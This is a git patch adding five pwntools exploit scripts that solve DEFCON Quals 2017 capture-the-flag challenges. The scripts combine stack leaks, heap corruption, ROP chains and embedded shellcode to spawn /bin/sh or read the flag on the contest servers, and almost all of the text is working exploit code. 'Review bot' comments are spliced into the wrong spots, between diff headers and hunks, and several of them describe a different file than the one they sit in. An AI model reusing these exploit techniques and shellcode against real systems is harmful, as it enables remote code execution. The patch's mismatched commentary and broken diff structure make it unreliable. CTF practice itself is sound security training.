From 03b2d3288e2f5827d02716c43e79284189022238 Mon Sep 17 00:00:00 2001
From: Nick Gregory
Date: Mon, 1 May 2017 01:58:10 -0400
Subject: [PATCH] Add pwnables from DEFCON Quals 2017

---
 DEFCON_Quals_2017/badint.py | 62 ++++++++++++++++++++++++++++
 DEFCON_Quals_2017/beat.py | 78 +++++++++++++++++++++++++++++++++++
 DEFCON_Quals_2017/emp.py | 82 +++++++++++++++++++++++++++++++++++++
 DEFCON_Quals_2017/ropdo.py | 48 ++++++++++++++++++++++
 DEFCON_Quals_2017/smash.py | 14 +++++++
 5 files changed, 284 insertions(+)
 create mode 100644 DEFCON_Quals_2017/badint.py
 create mode 100644 DEFCON_Quals_2017/beat.py
 create mode 100644 DEFCON_Quals_2017/emp.py
 create mode 100644 DEFCON_Quals_2017/ropdo.py
 create mode 100644 DEFCON_Quals_2017/smash.py

diff --git a/DEFCON_Quals_2017/badint.py b/DEFCON_Quals_2017/badint.py
new file mode 100644
index 0000000..86870ed
--- /dev/null
+++ b/DEFCON_Quals_2017/badint.py
@@ -0,0 +1,62 @@
+from pwn import *
+
+context.log_level = "DEBUG"
+
+#p = process('./badint')
+p = remote('badint_7312a689cf32f397727635e8be495322.quals.shallweplayaga.me', 21813)
+
+p.recv()
+
+# stack leak
+p.sendline('0')
+p.recv()
+p.sendline('0')
+p.recv()
+p.sendline('A'*512)
+p.recvuntil(']')
+stack = u64(p.recv(16).decode('hex')[::-1])
+print "stack:", hex(stack)
+p.recvuntil('SEQ #')
+
+
+# pivot rsp to a lot of stack data we control
+p.sendline('0') # seq
+p.recv()
+p.sendline(str(256-0x20)) # offset
+p.recv()
+
+saved_bp = stack-32
+our_buf = stack+144+0x1d8-0x48
+pop_5x = 0x000000000040252d
+
+print "saved bp:", hex(saved_bp)
+print "our buf:", hex(our_buf)
+
+pop_rdi = 0x0000000000402533
+pop_rsi_r15 = 0x0000000000402531
+call_rax = 0x0000000000400ccd
+dlsym = 0x400B90
+# overwrite
+ # v-- dest - 0x8 # val
+thing = p64(saved_bp - 8).encode('hex') + p64(our_buf).encode('hex')
+thing += p64(0x604000).encode('hex') # ptr_to_n_elems
+thing += '1' * (472-0x30-len(thing))
+
+ptr_to_system = our_buf + 8*10
+ptr_to_bin_sh = ptr_to_system + len("system\x00")
+thing += p64(pop_rdi) + p64(0)
+thing += p64(pop_rsi_r15) + p64(ptr_to_system) + p64(0)
+thing += p64(dlsym)
+thing += p64(pop_rdi) + p64(ptr_to_bin_sh)
+thing += p64(call_rax)
+
+thing += "system\x00"
+thing += "/bin/sh\x00"
+
+print len(thing)
+
+p.sendline(thing)
+p.recv()
+p.sendline('Yes') # Last seg
+
+p.interactive()
diff --git a/DEFCON_Quals_2017/beat.py b/DEFCON_Quals_2017/beat.py
new file mode 100644
index 0000000..223ca16
--- /dev/null
+++ b/DEFCON_Quals_2017/beat.py
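Review bot: `stack = u64(p.recv(16).decode('hex')[::-1])` (new-file line 17) assumes the 16 hex digits arrive in one read, but `recv(16)` returns up to 16 bytes, so a short read hands a truncated string to the hex codec and `u64` then raises on length; `p.recvn(16)` waits for all 16. `pop_5x` (line 30) is assigned and never used, and the offsets `stack+144+0x1d8-0x48` and `472-0x30-len(thing)` have no comment saying what they are measured from, so nobody can re-derive them for another build. The script is also Python 2 only (`print` statements, the `'hex'` codec); a header comment such as `# Python 2 only: print statements and the 'hex' codec; addresses are for the quals build of ./badint` would save the next reader a failed run.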
@@ -0,0 +1,78 @@
+from pwn import *
+
+context.log_level = "DEBUG"
+
+#p = process('./beatmeonthedl')
+p = remote('beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me', 6969)
+pause()
+
+p.recvuntil('username: ')
+p.sendline('A'*16)
+p.recvuntil('user: ')
+p.recvuntil('A'*16)
+l = p.recvuntil('\n')[:-1]
+l += '\x00' * (8-len(l))
+stack_leak = u64(l)
+print hex(stack_leak)
+
+p.sendline('mcfly')
+p.recvuntil('Pass: ')
+p.sendline('awesnap')
+
+p.recvuntil('| ')
+
+def request(data):
+ p.sendline('1')
+ p.recvuntil('> ')
+ p.sendline(data)
+ p.recvuntil('| ')
+
+def delete(idx):
+ p.sendline('3')
+ p.recvuntil('choice: ')
+ p.sendline(str(idx))
+ p.recvuntil('| ')
+
+def change(idx, data):
+ p.sendline('4')
+ p.recvuntil('choice: ')
+ p.sendline(str(idx))
+ p.recvuntil('data: ')
+ p.sendline(data)
+ p.recvuntil('| ')
+
+
+request('A'*0x38)
+request('B'*0x38)
+request('C'*0x38)
+request('D'*0x38)
+request('E'*0x38)
+
+delete(3)
+
+change(2, 'F'*0x38 + p64(0x609ab8)*3)
+
+request('G'*4)
+
+delete(2)
+
+change(1, 'H'*0x38 + p64(0x609ac0)*3)
+
+main_ret_addr = stack_leak + 40
+
+request(p64(main_ret_addr-0x18))
+
+
+request('a'*24)
+
+change(0, p64(0x609b88-0x18))
+
+request('1'*4)
+
+delete(1)
+
+change(0, 'A'*0x3b + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")
+
+p.sendline('5')
+
+p.interactive()
diff --git a/DEFCON_Quals_2017/emp.py b/DEFCON_Quals_2017/emp.py
new file mode 100644
index 0000000..eaa435a
--- /dev/null
+++ b/DEFCON_Quals_2017/emp.py
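Review bot: `l += '\x00' * (8-len(l))` (new-file line 14) silently appends nothing when the leaked string is longer than 8 bytes, because a negative repeat count yields an empty string, and the failure then surfaces as a length error inside `u64(l)`; `l = l.ljust(8, '\x00')` followed by `assert len(l) == 8, repr(l)` states the expectation where it is made. The helpers `request`, `delete` and `change` are defined after the login exchange on lines 9–22; moving them above the first `p.recvuntil` and giving each a one-line docstring naming the menu option it drives would make the script readable top to bottom. The shellcode literal on line 74 is repeated byte-for-byte in smash.py in this same commit; one shared constant would keep the two copies from drifting.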
@@ -0,0 +1,82 @@
+from pwn import *
+
+context.log_level = "DEBUG"
+
+#p = process('./empanada')
+p = remote('empanada_45e50f0410494ec9cfb90430d2e86287.quals.shallweplayaga.me', 47281)
+
+
+def msg(t, size, idx):
+ return chr(t << 7 | idx << 5 | size)
+
+def msg_cnt(idx=0, t=1):
+ return msg(t,1,idx) + chr(64)
+
+def del_msg(msg_idx, idx=0, t=1):
+ return msg(t,2,idx) + chr(80) + chr(msg_idx)
+
+def get_all(idx=0, t=1):
+ return msg(t,1,idx) + chr(96)
+
+def get_msg(msg_idx, idx=0, t=1):
+ return msg(t,2,idx) + chr(48) + chr(msg_idx)
+
+def get_hash(msg_idx, idx=0, t=1):
+ return msg(t,2,idx) + chr(32) + chr(msg_idx)
+
+def store_msg(idx=1, t=1):
+ return msg(t,1,idx) + chr(16)
+
+def del_all(idx=0, t=1):
+ return msg(t,1,idx) + chr(0)
+
+def exit(idx=0, t=1):
+ return msg(t,1,idx) + chr(1)
+
+def clr_invalid(idx=0, t=1):
+ return msg(t,1,idx) + chr(0xfe)
+
+def data_msg(data, idx=0, t=1):
+ return msg(t, len(data), idx) + data
+
+# setup what will become our own empmsg
+shellcode_addr = 0x313371ef
+
+p.sendline(store_msg() + data_msg('A'*9 + p32(shellcode_addr) + 'A'*3))
+print p.recv()
+p.sendline(store_msg() + data_msg(' ' + p32(0x31337138) + 'B'*7))
+print p.recv()
+
+# The two data messages with t=0 will get rellocated to get_all's msg itself
+# and then to get_all's response buffer
+p.sendline(store_msg() + data_msg('', t=0))
+print p.recv()
+p.sendline(store_msg() + data_msg('', t=0))
+print p.recv()
+
+p.sendline(clr_invalid())
+print p.recv()
+
+p.sendline(get_all())
+print p.recv()
+
+# read in to another shellcode buffer at 0x31338000 so we don't have to worry
+# about length and jump to it
+shellcode = "\xb8\x03\x00\x00\x00\xbb\x00\x00\x00\x00\xb9\x00\x8031\xba\xe8\x03\x00\x00\xcd\x80\xb8\x00\x8031\xff\xe0"
+
+p.sendline(store_msg() + data_msg(shellcode))
+print p.recv()
+
+# at this point, the last store should have a dangling next pointer.
+# now try to get the hash which walks the linked list, hopefully calling
+# something we control from the original messages
+
+p.sendline(get_hash(3))
+
+# 2nd stage shellcode which opens "flag", reads, and writes to stdout
+p.sendline("\xb8\x05\x00\x00\x00j\x00hflag\x89\xe3\xb9\x00\x00\x00\x00\xcd\x80\x89\xc3\xb8\x03\x00\x00\x00\xb9\x00\x9031\xbad\x00\x00\x00\xcd\x80\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xb9\x00\x9031\xbad\x00\x00\x00\xcd\x80")
+
+p.sendline('ls')
+print p.recv()
+
+p.interactive()
diff --git a/DEFCON_Quals_2017/ropdo.py b/DEFCON_Quals_2017/ropdo.py
new file mode 100644
index 0000000..bce9adc
--- /dev/null
+++ b/DEFCON_Quals_2017/ropdo.py
@@ -0,0 +1,48 @@
+from pwn import *
+
+context.log_level = "DEBUG"
+
+p = remote('peropdo_bb53b90b35dba86353af36d3c6862621.quals.shallweplayaga.me', 80)
+#p = process('./peropdo')
+pause()
+
+seed = 0x048ab95a
+name_addr = 0x80ecfed
+pad = name_addr - 0x80ecfc4
+xor_eax = 0x08054b80
+inc_eax = 0x0807bf06
+pop_eax = 0x080e77a4
+pop_ebx = 0x08058e28
+pop_ecx = 0x080e5ee1
+pop_edx = 0x0806f2fa
+interrupt = 0x08049551
+
+s = p32(seed)
+for x in range(pad+4):
+ s += ("A")
+s += p32(pop_ebx) + p32(0x80ed051) # -> /bin/sh
+s += p32(pop_edx) + p32(0x80ed05c) # envp
+s += p32(pop_eax) + p32(0x80ed040) # argv - 0x24
+s += p32(pop_ecx) + p32(0x80ed051) # -> /bin/sh
+s += p32(0x08054322) # mov [eax + 0x24], ecx; ret
+s += p32(pop_ecx) + p32(0x80ed064) # argv -> [*/bin/sh, 0]
+
+s += p32(xor_eax)
+for x in range(11):
+ s += p32(inc_eax)
+
+s += p32(interrupt)
+s += "/bin/sh"
+
+assert '\x09' not in s
+assert '\x0a' not in s
+assert '\x0b' not in s
+assert '\x00' not in s
+
+p.recv()
+p.sendline(s)
+p.recvuntil('?\n')
+p.sendline("23")
+p.recv()
+p.sendline("n")
+p.interactive()
diff --git a/DEFCON_Quals_2017/smash.py b/DEFCON_Quals_2017/smash.py
new file mode 100644
index 0000000..c513059
--- /dev/null
+++ b/DEFCON_Quals_2017/smash.py
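Review bot: `def exit(idx=0, t=1)` (new-file line 33) shadows the `exit` builtin for the rest of the module, so a later `exit()` call would build a protocol byte instead of terminating the script; renaming it `exit_msg` also matches the other `*_msg` helpers. `msg` packs `size` into the low five bits of `t << 7 | idx << 5 | size` with no range check, so `data_msg` with 32 or more bytes of payload spills into the `idx` bits and `chr` only raises once the value passes 255; a guard such as `if not (0 <= size < 32 and 0 <= idx < 4 and t in (0, 1)): raise ValueError('field out of range')` fails at the right place. A docstring on `msg` describing that bit layout would spare readers from reconstructing it from the helpers.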
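Review bot: The two padding loops `for x in range(pad+4): s += ("A")` and `for x in range(11): s += p32(inc_eax)` (new-file lines 21–22 and 31–32) are the manual form of sequence repetition; `s += 'A' * (pad + 4)` and `s += p32(inc_eax) * 11` say the same thing in one line each and drop the unused loop variable. The four `assert '\x00' not in s`-style checks on lines 37–40 are the only validation of the payload and are stripped under `python -O`; `if any(c in s for c in '\x00\x09\x0a\x0b'): raise ValueError('forbidden byte in payload')` keeps the check in every mode. The gadget constants on lines 12–18 and the magic `seed` would also benefit from a comment naming the binary build they were taken from.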
@@ -0,0 +1,14 @@
+from pwn import *
+
+#p = process('./smashme')
+p = remote('smashme_omgbabysfirst.quals.shallweplayaga.me', 57348)
+
+pause()
+
+magic = "Smash me outside, how bout dAAAAAAAAAAA"
+push_rsp_ret = 0x000000000044611d
+shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
+
+p.sendline(magic+'B'*33+p64(push_rsp_ret)+shellcode)
+
+p.interactive()
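Review bot: `'B'*33` and `push_rsp_ret = 0x000000000044611d` (new-file lines 9 and 12) carry no comment saying what the 33 bytes fill or which build the address came from, so the script cannot be checked or adapted; a comment such as `# padding length and gadget address are specific to the quals build of ./smashme` is the minimum. The `shellcode` literal duplicates the one in beat.py byte-for-byte; a shared constant in one module would keep them in sync. Unlike the other scripts in this commit, nothing is read from the connection before `p.sendline`, so `pause()` is the only synchronisation; if that is intentional a one-line comment should say so.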